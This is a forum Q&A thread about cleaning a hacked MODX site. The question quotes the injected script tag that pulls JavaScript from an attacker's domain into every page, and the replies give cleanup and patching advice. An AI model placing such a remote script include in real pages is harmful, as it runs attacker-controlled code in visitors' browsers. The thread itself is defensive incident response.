# ModX site hacked ... "stat.rolledwil.biz" ... how do I clean?

Tags: security, modx

Our modx site now has this line injected at the end of every page:

```
<noindex>
<script src="//stat.rolledwil.biz/stat.php?17323616676"></script>
</noindex>
```

right before the final `</body>` tag!

How do I get rid of this?

Comment: Inform your hosting company. Restore the whole system from known good backups. Find the hole that allowed this and patch it.

Comment: "find the hole" ... how do I do that exactly?

Comment: Found thread about this hack:
http://forums.modx.com/thread/?thread=85986

Had to delete and clean some files. Hope it doesn't come back.

Not sure how to prevent in future ...

Comment: Do you have access to the server logs? Apache, iptables, and such? Look trough your web files and find something that you didn't place there. Check the file privileges. That could be a good start. If you use a CMS, be sure you have the latest version. Also check http://security.stackexchange.com/

Comment: MODX Revo has security injury till 2.2.8 version. I think you have modified core/model/modx/modresponse.class.php file. Something like [this](https://www.diigo.com/item/image/3q9lh/sr92?size=o).
You have to update MODX core.

Answer (score 0):

Try to locate this code in your db: there can be 4 places - plugins, templates, chunks and content (resources) tables - modx_site_plugins, modx_site_templates,     modx_site_content,  modx_site_htmlsnippets.

After you find it - you can remove via query or manually.